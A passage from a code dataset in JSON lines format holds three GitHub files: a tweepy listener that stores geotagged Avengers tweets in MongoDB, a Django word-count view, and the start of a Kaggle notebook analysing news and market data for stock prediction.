+{"seq_id": "12934990057", "text": "from __future__ import absolute_import, print_function\n\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport tweepy\nimport json\nfrom pymongo import MongoClient\nimport datetime\n\n# Your credentials go here\n\n\nclass AvengersListener(StreamListener):\n\n def on_error(self, status_code):\n if status_code == 420:\n return False\n else:\n print('ERROR:' + repr(status_code))\n return True\n\n def on_data(self, raw_data):\n status = json.loads(raw_data)\n try:\n if 'delete' not in status: # Tweepy también detecta cuando se ha eliminado un tweet\n if status['geo']:\n created_at = status['created_at']\n created_at = datetime.datetime.strptime(created_at, '%a %b %d %H:%M:%S +0000 %Y')\n user_name = status['user']['screen_name']\n text = status['text']\n lat = str(status['coordinates']['coordinates'][1])\n lon = str(status['coordinates']['coordinates'][0])\n rts = status['retweet_count']\n favs = status['favorite_count']\n lang = status['user']['lang']\n print(status['text'])\n client = MongoClient('localhost', 27017)\n db = client['Tweets']\n collection = db['avengers']\n tweet = {'date': created_at, 'user': user_name, 'tweet': text,\n 'latitude': lat, 'longitude': lon, 'language': lang, 'retweets':rts, 'favourites':favs}\n collection.insert_one(tweet)\n except BaseException as e:\n print(\"Error on_data: %s\" % str(e))\n\n\nif __name__ == '__main__':\n\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n print(api.me().name)\n #\n # places = api.geo_search(query=\"USA\", granularity=\"country\")\n # place_id = places[0].id\n # tweets = api.search(q=\"place:%s\" % place_id)\n\n av_stream = Stream(auth, AvengersListener())\n av_stream.filter(track=['#avengersendgame','#endgame'])\n", "repo_name": "russomaa/Data-Science-Master", "sub_path": "BD_map_tweets/avengerslistener.py", "file_name": "avengerslistener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tweepy.streaming.StreamListener", "line_number": 14, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 38, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 50, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 52, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "71961221927", "text": "from collections import OrderedDict\nfrom django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom .forms import GraphifyForm\nimport json\nimport string\n\ndef error_404(request):\n return render(request, \"404.html\", {})\n\n\ndef error_500(request):\n return render(request, \"500.html\", {})\n\n# Create your views here.\nclass HomeView(View):\n\tform_class = GraphifyForm\n\ttemplate_name = \"home.html\"\n\n\tdef get(self, request, *args, **kwargs):\n\t\tform = self.form_class(None)\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'labels': None,\n\t\t\t'data': None\n\t\t}\n\t\treturn render(request, self.template_name, context)\n\n\tdef post(self, request):\n\t\tform = self.form_class(request.POST, request.FILES or None)\n\t\terror = None\n\n\t\tif form.is_valid():\n\t\t\ttext_file = form.cleaned_data['file_input']\n\t\t\tdisplay_num = int(form.cleaned_data['display_num'])\n\t\t\tword_count = {}\n\n\t\t\tif not text_file:\n\t\t\t\tcontext ={\n\t\t\t\t\t'form':form,\n\t\t\t\t\t'labels': None,\n\t\t\t\t\t'data': None\n\t\t\t\t}\n\t\t\t\treturn render(request, self.template_name, context)\n\n\t\t\t# chck if this file is a text file\n\t\t\tif '.txt' in str(text_file)[-4:]:\n\t\t\t\ttry:\n\t\t\t\t\ttext_file_data = form.cleaned_data['file_input'].read().decode('utf-8')\n\t\t\t\t\ttranslator = text_file_data.maketrans('', '', string.punctuation)\n\t\t\t\t\ttext_file_data = text_file_data.translate(translator).lower()\n\n\t\t\t\t\tfor word in text_file_data.split():\n\t\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\t\tword_count[word] += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tword_count[word] = 1\n\n\t\t\t\texcept UnicodeDecodeError as u:\n\t\t\t\t\terror = 'The file you tried to parse has encountered \\\n\t\t\t\t\ta unicode decoding error. 
Please fix the file and \\\n\t\t\t\t\tresubmit.'\n\t\t\t\texcept:\n\t\t\t\t\terror = 'An unknown error occured.'\n\n\t\t\telse:\n\t\t\t\terror = 'Please enter a text file please'\n\n\t\t\t# make sure the size of the list matches the\n\t\t\t# total number of bar you want to return\n\t\t\t# also put data in the right order\n\t\t\tlabels = []\n\t\t\tdata = []\n\t\t\tcount = len(word_count)\n\t\t\tword_count = OrderedDict(sorted(word_count.items(), key=lambda t: t[1]))\n\t\t\tword_count = list(word_count.items())\n\t\t\tword_count.reverse()\n\n\t\t\tif display_num > count:\n\t\t\t\tdisplay_num = count\n\n\t\t\tfor i in word_count[:display_num]:\n\t\t\t data.append(str(i[0]))\n\t\t\t labels.append(str(i[1]))\n\n\t\tcontext ={\n\t\t\t'form':form,\n\t\t\t'error': error,\n\t\t\t'labels': json.dumps(labels),\n\t\t\t'data': json.dumps(data)\n\t\t}\n\t\treturn render(request, self.template_name, context)\n", "repo_name": "devmasternathan/graphify", "sub_path": "graphify/graph/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 19, "usage_type": "name"}, {"api_name": "forms.GraphifyForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 53, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "10146213215", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Complete EDA + features engineering + voting LightGBM\n# Nguyen Dang Minh, PhD\n# \n# * [Loading the data](#load_data)\n# * [Exploring news data](#explore_news)\n# * [Exploring market data](#explore_market)\n# * [Preprocessing](#preprocessing)\n# * [Features engineering](#feature_engineering)\n# * [Building model](#building_model)\n# * [Making submission](#making_submission)\n\n# In this notebook, I will present my statistical analysis on both the news and market data of the Kaggle problem: [Using News to Predict Stock Movements](http://https://www.kaggle.com/c/two-sigma-financial-news)\n\n# In[ ]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport datetime\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport re\nfrom scipy import stats\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\nimport random\nrandom.seed(1)\nimport time\n\nimport xgboost as xgb\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import get_scorer\nfrom sklearn.metrics import f1_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import VotingClassifier\nimport lightgbm as lgb\nfrom sklearn.externals.joblib import Parallel, delayed\nfrom sklearn.base import clone\n\nimport pickle\n\n# In[ ]:\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# In[ ]:\n\n\nmatplotlib.rcParams['figure.figsize'] = (10, 5)\nmatplotlib.rcParams['font.size'] = 12\n\n# In[ ]:\n\n\nfrom kaggle.competitions import twosigmanews\n# You can only call make_env() once, so don't lose it!\nenv = twosigmanews.make_env()\nprint('Done!')\n\n# \n# \n# ## Load the data\n\n# In[ ]:\n\n\n(market_train_orig, news_train_orig) = env.get_training_data()\n\n# In[ ]:\n\n\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\nprint('Market train shape: ',market_train_df.shape)\nprint('News train shape: ', news_train_df.shape)\n\n# In[ ]:\n\n\nmarket_train_df.describe()\n\n# In[ ]:\n\n\nnews_train_df.describe()\n\n# \n# \n# ## Explore news data\n\n# ### Evolutions over time\n\n# In[ ]:\n\n\n# Sort values by time then extract date\nnews_train_df = news_train_df.sort_values(by='time')\nnews_train_df['date'] = news_train_df['time'].dt.date\n\n# In[ ]:\n\n\n# Function to plot time series data\ndef plot_vs_time(data_frame, column, calculation='mean', span=10):\n if calculation == 'mean':\n group_temp = data_frame.groupby('date')[column].mean().reset_index()\n if calculation == 'count':\n group_temp = data_frame.groupby('date')[column].count().reset_index()\n if calculation == 'nunique':\n group_temp = data_frame.groupby('date')[column].nunique().reset_index()\n group_temp = group_temp.ewm(span=span).mean()\n fig = plt.figure(figsize=(10,3))\n plt.plot(group_temp['date'], group_temp[column])\n plt.xlabel('Time')\n plt.ylabel(column)\n plt.title('%s versus time' %column)\n\n# In[ ]:\n\n\nplot_vs_time(news_train_df, 'sourceId', calculation='count', span=10)\nplt.title('News count vs time')\nplt.ylabel('Count')\n\n# There is a maximum peak every quarter (time for quaterly financial report) and a minimum peak at the end of the year (time for Christmast holliday.)\n\n# In[ ]:\n\n\n# Plot time evolution of several parameters\n\ncolumns = ['urgency', 'takeSequence', 
'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H', 'volumeCounts24H']\n\nfor column in columns:\n plot_vs_time(news_train_df, column)\n\n# ### Time delay\n\n# In[ ]:\n\n\ntime_delay = (pd.to_datetime(news_train_df['time']) - pd.to_datetime(news_train_df['firstCreated']))\ntime_delay_log10 = np.log10(time_delay.dt.total_seconds()/60+1)\n\n# In[ ]:\n\n\nplt.hist(time_delay_log10, bins=np.arange(0,2.5,0.25), rwidth=0.7)\nplt.xlabel('$Log_{10}$(Time delay in minutes +1)')\nplt.ylabel('Counts')\nplt.title('Delay time distribution')\n\n# In[ ]:\n\n\ntime_delay_min = time_delay.dt.total_seconds()/60\ntime_delay_df = time_delay_min.to_frame().join(news_train_df['date'].to_frame())\ntime_delay_df.columns = ['delay','date']\nplot_vs_time(time_delay_df, 'delay')\nplt.ylabel('Delay (minutes)')\n\n# ### Urgency\n\n# In[ ]:\n\n\nurgency_count = news_train_df.groupby('urgency')['sourceId'].count()\nurgency_count = urgency_count/urgency_count.sum()\nprint('Urgency ratio')\nurgency_count.sort_values(ascending=True)\ndel urgency_count\n\n# ### Take sequence\n\n# In[ ]:\n\n\ntake_sequence = news_train_df.groupby('takeSequence')['sourceId'].count()\n\n# In[ ]:\n\n\ntake_sequence = take_sequence.sort_values(ascending= False)\ntake_sequence[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Take sequence')\nplt.title('Top 10 take sequence')\nplt.gca().invert_yaxis()\ndel take_sequence\n\n# ### Providers\n\n# In[ ]:\n\n\nprovider_count = news_train_df.groupby('provider')['sourceId'].count()\n\n# In[ ]:\n\n\nprovider_sort = provider_count.sort_values(ascending= False)\nprovider_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Provider')\nplt.title('Top 10 news provider')\nplt.gca().invert_yaxis()\ndel provider_count\n\n# ### Subjects\n\n# In[ ]:\n\n\n# Extract data from a single cell\ndef contents_to_list(contents):\n text = contents[1:-1]\n text = re.sub(r\",\",' ',text)\n text = re.sub(r\"'\",\"\", text)\n text_list = text.split(' ')\n return text_list\n\n# Put data from columns into dict\ndef get_content_dict(content_column):\n content_dict = {}\n for i in range(len(content_column)):\n this_cell = content_column[i]\n content_list = contents_to_list(this_cell) \n for content in content_list:\n if content in content_dict.keys():\n content_dict[content] += 1\n else:\n content_dict[content] = 1\n return content_dict\n\n\n# In[ ]:\n\n\nsubjects = news_train_df.sample(n=10000, random_state=1)['subjects']\nsubjects_dict = get_content_dict(subjects)\n\n# In[ ]:\n\n\nsubjects_df = pd.Series(subjects_dict).sort_values(ascending=False)\nsubjects_df[:15].plot.barh()\nplt.ylabel('Subjects')\nplt.xlabel('Counts')\nplt.title('Top subjects for 10k data')\nplt.gca().invert_yaxis()\ndel subjects_df\n\n# ### Audiences\n\n# In[ ]:\n\n\naudiences = news_train_df.sample(n=10000, random_state=1)['audiences']\naudiences_dict = get_content_dict(audiences)\n\n# In[ ]:\n\n\naudiences_df = pd.Series(audiences_dict).sort_values(ascending=False)\naudiences_df[:15].plot.barh()\nplt.ylabel('Audiences')\nplt.xlabel('Counts')\nplt.title('Top audiences for 10k data')\nplt.gca().invert_yaxis()\n\n# ### Company Count\n\n# In[ ]:\n\n\nnews_train_df['companyCount'].hist(bins=np.arange(0,30,1))\nplt.xlabel('Company count')\nplt.title('Company count distribution')\n\n# ### Head line tag\n\n# In[ ]:\n\n\nhead_line = news_train_df.groupby('headlineTag')['sourceId'].count()\n\n# In[ ]:\n\n\nhead_line_sort = head_line.sort_values(ascending= 
False)\nhead_line_sort[:10].plot.barh()\nplt.xlabel('Count')\nplt.ylabel('Head line')\nplt.title('Top 10 head lines')\nplt.gca().invert_yaxis()\ndel head_line\n\n# Most headlines are blank. This properties may not be important.\n\n# ### First sentence - Urgency - relevance - sentiment Word Count\n\n# **First sentence and urgency**\n\n# In[ ]:\n\n\nnews_train_df['firstMentionSentence'].hist(bins=np.arange(0,20,1))\nplt.xlabel('First mention sentence')\nplt.ylabel('Count')\nplt.title('First mention sentence distribution')\n\n# In[ ]:\n\n\nsentence_urgency = news_train_df.groupby('firstMentionSentence')['urgency'].mean()\nsentence_urgency.head(5)\ndel sentence_urgency\n\n# **First sentence and relevance**\n\n# In[ ]:\n\n\nnews_train_df['relevance'].hist(bins=np.arange(0,1.01,0.05))\nplt.xlabel('Relevance')\nplt.ylabel('Count')\nplt.title('Relevance distribution')\n\n# In[ ]:\n\n\nsentence_relevance = news_train_df.groupby('firstMentionSentence')['relevance'].mean()\nsentence_relevance[:15].plot.barh()\nplt.xlabel('Relevance')\nplt.title('Relevance by sentence')\nplt.gca().invert_yaxis()\ndel sentence_relevance\n\n# **Sentiment word count and relevance**\n\n# In[ ]:\n\n\nsentimentWordCount = news_train_df.groupby('sentimentWordCount')['sourceId'].count().reset_index()\nplt.plot(sentimentWordCount['sentimentWordCount'], sentimentWordCount['sourceId'])\nplt.xlim(0,300)\nplt.xlabel('Sentiment words count')\nplt.ylabel('Count')\nplt.title('Sentiment words count distribution')\ndel sentimentWordCount\n\n# In[ ]:\n\n\nsentimentWordRatio = news_train_df.groupby('sentimentWordCount')['relevance'].mean()\nplt.plot(sentimentWordRatio)\nplt.xlim(0,2000)\nplt.ylabel('Relevance')\nplt.xlabel('Sentiment word count')\nplt.title('Sentiment word count and relevance')\ndel sentimentWordRatio\n\n# **Sentiment ratio**\n\n# In[ ]:\n\n\nnews_train_df['sentimentRatio'] = news_train_df['sentimentWordCount']/news_train_df['wordCount']\nnews_train_df['sentimentRatio'].hist(bins=np.linspace(0,1.001,40))\nplt.xlabel('Sentiment ratio')\nplt.ylabel('Count')\nplt.title('Sentiment ratio distribution')\n\n# In[ ]:\n\n\nnews_train_df.sample(n=10000, random_state=1).plot.scatter('sentimentRatio', 'relevance')\nplt.title('Relevance vs sentiment ratio of 10k samples')\n\n# ### Asset name\n\n# In[ ]:\n\n\nasset_name = news_train_df.groupby('assetName')['sourceId'].count()\nprint('Total number of assets: ',news_train_df['assetName'].nunique())\n\n# In[ ]:\n\n\nasset_name = asset_name.sort_values(ascending=False)\nasset_name[:10].plot.barh()\nplt.gca().invert_yaxis()\nplt.xlabel('Count')\nplt.title('Top 10 assets news')\n\n# In[ ]:\n\n\nfor i, j in zip([-1, 0, 1], ['negative', 'neutral', 'positive']):\n df_sentiment = news_train_df.loc[news_train_df['sentimentClass'] == i, 'assetName']\n print(f'Top mentioned companies for {j} sentiment are:')\n print(df_sentiment.value_counts().head(5))\n print('')\n\n# ### Remove outliers and plot correlation\n\n# In[ ]:\n\n\n# Function to remove outliers\ndef remove_outliers(data_frame, column_list, low=0.02, high=0.98):\n temp_frame = data_frame\n for column in column_list:\n this_column = data_frame[column]\n quant_df = this_column.quantile([low,high])\n low_limit = quant_df[low]\n high_limit = quant_df[high]\n temp_frame[column] = data_frame[column].clip(lower=low_limit, upper=high_limit)\n return temp_frame\n\n# In[ ]:\n\n\n# Remove outlier\ncolumns_outlier = ['takeSequence', 'bodySize', 'sentenceCount', 'wordCount', 'sentimentWordCount', 'firstMentionSentence','noveltyCount12H',\\\n 
'noveltyCount24H', 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D', 'volumeCounts12H', 'volumeCounts24H',\\\n 'volumeCounts3D','volumeCounts5D','volumeCounts7D']\nnews_rmv_outlier = remove_outliers(news_train_df, columns_outlier)\n\n# In[ ]:\n\n\n# Plot correlation\ncolumns_corr = ['urgency', 'takeSequence', 'companyCount','marketCommentary','sentenceCount',\\\n 'firstMentionSentence','relevance','sentimentClass','sentimentWordCount','noveltyCount24H',\\\n 'noveltyCount3D', 'noveltyCount5D', 'noveltyCount7D','volumeCounts24H','volumeCounts3D','volumeCounts5D','volumeCounts7D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(news_rmv_outlier[columns_corr].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# \n# \n# ## Explore market data\n\n# In[ ]:\n\n\nprint('Check null data:')\nmarket_train_df.isna().sum()\n\n# **Some preprocessing:**\n# * Sort data in chronological order\n# * All NAN data comes from the market adjusted column. We fill them up with the raw value data\n\n# In[ ]:\n\n\n# Sort data\nmarket_train_df = market_train_df.sort_values('time')\nmarket_train_df['date'] = market_train_df['time'].dt.date\n\n# Fill nan\nmarket_train_fill = market_train_df\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_fill[column_market[i]] = market_train_fill[column_market[i]].fillna(market_train_fill[column_raw[i]])\n\n# ### Plot data versus time\n\n# In[ ]:\n\n\nplot_vs_time(market_train_fill, 'assetCode', 'count')\nplt.title('Number of asset codes versus time')\n\n# In[ ]:\n\n\n# Inspired by https://www.kaggle.com/artgor/eda-feature-engineering-and-everything\nfor i in [0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95]:\n price_df = market_train_fill.groupby('date')['close'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['close'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Price')\nplt.title('Market close price by quantile')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsClosePrevRaw1'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsClosePrevRaw1'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsClosePrevRaw1 by quantile')\n\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevRaw10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevRaw10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevRaw10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenPrevMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenPrevMktres10'], label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenPrevMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['returnsOpenNextMktres10'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['returnsOpenNextMktres10'], 
label='%.2f quantile' %i)\nplt.legend(loc=1)\nplt.xlabel('Time')\nplt.ylabel('Value')\nplt.title('returnsOpenNextMktres10 by quantiles')\n\n# In[ ]:\n\n\nfor i in [0.05, 0.25, 0.5, 0.75, 0.95]:\n price_df = market_train_fill.groupby('date')['volume'].quantile(i).reset_index()\n plt.plot(price_df['date'], price_df['volume'], label='%.2f quantile' %i)\nplt.legend(loc='best')\nplt.xlabel('Time')\nplt.ylabel('Volumes')\nplt.title('Market trade volumes by quantile')\n\n# ### Difference between raw values and market adjusted values\n# \n# Let see if there's any difference between raw return and market adjusted return\n\n# In[ ]:\n\n\ncolumn_mkt_raw_diff = []\nfor i in range(len(column_market)):\n this_raw = column_raw[i]\n this_market = column_market[i]\n new_column_name = 'mkt_raw_diff'+this_raw.replace('returns','').replace('Raw','')\n column_mkt_raw_diff.append(new_column_name)\n market_train_fill[new_column_name] = market_train_fill[this_market] - market_train_fill[this_raw]\n\n# In[ ]:\n\n\nmarket_train_fill[column_mkt_raw_diff].describe()\n\n# The difference between raw return and market adjusted returns are negligible, but there are some extreme values. Those values are noise and needs to be taken care of\n\n# ### Asset codes\n\n# In[ ]:\n\n\nassetCode_df = market_train_df.groupby('assetCode')['volume'].sum().sort_values(ascending=False)\nprint('There are %i unique asset code' %len(assetCode_df))\n\n# In[ ]:\n\n\nunknown_name = market_train_fill[market_train_fill['assetName']=='Unknown']\nunknown_count = unknown_name['assetCode'].value_counts().sort_values(ascending=False)\n\n# In[ ]:\n\n\nprint('There are %i unique asset code with unknown asset name' %len(unknown_count))\n\n# In[ ]:\n\n\nunknown_count[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Counts')\nplt.title('Top 15 asset code with Unknown asset name')\nplt.gca().invert_yaxis()\n\n# In[ ]:\n\n\nassetCode_df[:15].plot.barh()\nplt.ylabel('assetCode')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset code by volume')\nplt.gca().invert_yaxis()\n\n# ### Asset Name\n\n# In[ ]:\n\n\nassetName_Volume = market_train_df.groupby('assetName')['volume'].sum().sort_values(ascending=False)\nassetName_Volume[:15].plot.barh()\nplt.ylabel('assetName')\nplt.xlabel('Trading volume')\nplt.title('Top 15 asset name by volume')\nplt.gca().invert_yaxis()\ndel assetName_Volume\n\n# The volume ranking by coorperation seems to be the same as the rank of asset codes they own, e.g. the one with most popular codes has the most trading volume\n\n# In[ ]:\n\n\nassetName_code = market_train_df.groupby('assetName')['assetCode'].nunique().reset_index().sort_values(by='assetCode',ascending=False)\n\n# In[ ]:\n\n\nassetCodeCount = assetName_code.groupby('assetCode')['assetName'].count().reset_index()\nassetCodeCount.columns = ['assetCodeNo', 'counts']\nassetCodeCount.head()\ndel assetCodeCount\n\n# **The vast majority of companies has only one asset code**. One '*company*' that has 110 actually is the 'Unknown' category. Magically, some companies don't even have any asset code. 
Currently I have no explanation for this.\n\n# ### Correlations\n\n# In[ ]:\n\n\ncolumns_corr_market = ['volume', 'open', 'close','returnsClosePrevRaw1','returnsOpenPrevRaw1',\\\n 'returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10','returnsOpenPrevRaw10',\\\n 'returnsClosePrevMktres10', 'returnsOpenPrevMktres10', 'returnsOpenNextMktres10']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(market_train_fill[columns_corr_market].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation')\n\n# ### Dig deeper to a single asset\n# \n# Let's take a closer look to a single asset. Here I choose the one with largest trading volumen: 'Bank of America Corp'\n\n# In[ ]:\n\n\nassetCode = 'Bank of America Corp'\nthisAssetMark_df = market_train_fill[market_train_fill['assetName']==assetCode].sort_values(by='date',ascending=True) \nthisAssetMark_df['diff_open_close'] = thisAssetMark_df['open'] - thisAssetMark_df['close']\nthisAssetNews_df = news_rmv_outlier[news_rmv_outlier['assetName']==assetCode]\n# Trading volume vs time\nthisAssetMark_df.plot(x='date', y='volume')\nplt.title('Trading volume vs time')\n# Price vs time\nthisAssetMark_df.plot(x='date', y='open')\nplt.title('Open price vs time')\n# Return vs time\nthisAssetMark_df.plot(x='date', y=['returnsOpenPrevRaw1', 'returnsOpenPrevRaw10','returnsOpenNextMktres10'], alpha=0.8)\nplt.title('Return vs time')\n\n# It can be seen that trading volume is strongly associated with price, i.e. trade increase when price hits bottom. Return is also strongly fluctuated at such time\n\n# In[ ]:\n\n\nnews_volume = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()\nnews_volume = news_volume.ewm(span=10).mean()\nnews_volume.plot(x='date',y='sourceId')\nplt.title('News volume vs time')\n\n# In[ ]:\n\n\nnews_urgency = thisAssetNews_df.groupby('date')['urgency'].mean().reset_index()\nnews_urgency = news_urgency.ewm(span=10).mean()\nnews_urgency.plot(x='date',y='urgency')\nplt.title('News urgency vs time')\n\n# The news increases in volumes and urgency as price drops\n\n# In[ ]:\n\n\nnews_relevance = thisAssetNews_df.groupby('date')['relevance'].mean().reset_index()\nnews_relevance = news_relevance.ewm(span=10).mean()\nnews_relevance.plot(x='date',y='relevance')\nplt.title('Relevance vs time')\n\n# In[ ]:\n\n\nnews_sentiment = thisAssetNews_df.groupby('date')['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'].mean().reset_index()\nnews_sentiment = news_sentiment.ewm(span=10).mean()\nnews_sentiment.plot(x='date',y=['sentimentClass','sentimentNegative','sentimentNeutral','sentimentPositive'], alpha=0.8)\nplt.title('Sentiment vs time')\n\n# Sentiments are mostly negative. Sentiment drops as price drops, which is expected.\n# \n# Now let's merge the news and market data and see their correlations\n\n# In[ ]:\n\n\n# Merge news and market data. 
Only keep numeric columns\nthisAssetMark_number = thisAssetMark_df[columns_corr_market+['date']]\nthisAssetMark_number = thisAssetMark_number.groupby('date').mean().reset_index()\nthisAssetNews_number = thisAssetNews_df[columns_corr+['date']]\nthisAssetNews_number = thisAssetNews_number.groupby('date').mean().reset_index()\nthisAssetNews_number['news_volume'] = thisAssetNews_df.groupby('date')['sourceId'].count().reset_index()['sourceId']\nthisAssetMerge = pd.merge(thisAssetMark_number, thisAssetNews_number, how='left', on = 'date')\n\n# In[ ]:\n\n\ncolumns_corr_merge = ['volume','open','close','returnsOpenPrevRaw1','returnsOpenPrevMktres1','returnsOpenPrevRaw10','returnsOpenPrevMktres10',\\\n 'returnsOpenNextMktres10','news_volume','urgency','sentenceCount','relevance','sentimentClass',\\\n 'noveltyCount24H','noveltyCount5D','volumeCounts24H','volumeCounts5D']\ncolormap = plt.cm.RdBu\nplt.figure(figsize=(18,15))\nsns.heatmap(thisAssetMerge[columns_corr_merge].astype(float).corr(), linewidths=0.1, vmax=1.0, vmin=-1., square=True, cmap=colormap, linecolor='white', annot=True)\nplt.title('Pair-wise correlation market and news')\n\n# This concludes the exploratory analysis. I will now proceed on data preprocessing and model building\n\n# In[ ]:\n\n\ndel thisAssetMark_df\ndel news_relevance\ndel market_train_fill\ndel news_train_df\ndel news_rmv_outlier\n\n# \n# \n# ## Preprocessing\n\n# In[ ]:\n\n\nmarket_train_orig = market_train_orig.sort_values('time')\nnews_train_orig = news_train_orig.sort_values('time')\nmarket_train_df = market_train_orig.copy()\nnews_train_df = news_train_orig.copy()\ndel market_train_orig\ndel news_train_orig\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['time'].dt.date>=datetime.date(2009,1,1)]\nnews_train_df = news_train_df.loc[news_train_df['time'].dt.date>=datetime.date(2009,1,1)]\n\n# ### Market data\n# * **Outliers - Open to close:** the difference between open price and close price cannot be too much difference (market would corrupt otherwise). We treat these outliers by clipping the close-to-open ratio\n\n# In[ ]:\n\n\nmarket_train_df['close_open_ratio'] = np.abs(market_train_df['close']/market_train_df['open'])\nthreshold = 0.5\nprint('In %i lines price increases by 50%% or more in a day' %(market_train_df['close_open_ratio']>=1.5).sum())\nprint('In %i lines price decreases by 50%% or more in a day' %(market_train_df['close_open_ratio']<=0.5).sum())\n\n# In[ ]:\n\n\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] < 1.5]\nmarket_train_df = market_train_df.loc[market_train_df['close_open_ratio'] > 0.5]\nmarket_train_df = market_train_df.drop(columns=['close_open_ratio'])\n\n# * **Fill nulls - Market values:** All null data comes from market adjusted columns. We fill them up with the raw values in the same row\n\n# In[ ]:\n\n\ncolumn_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\ncolumn_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\nfor i in range(len(column_raw)):\n market_train_df[column_market[i]] = market_train_df[column_market[i]].fillna(market_train_df[column_raw[i]])\n\n# * **Outliers-Returns:** Return should not exceed 50% or falls below 50%. If it does, it is either noise, or extreme data that will confuse our prediction later on. 
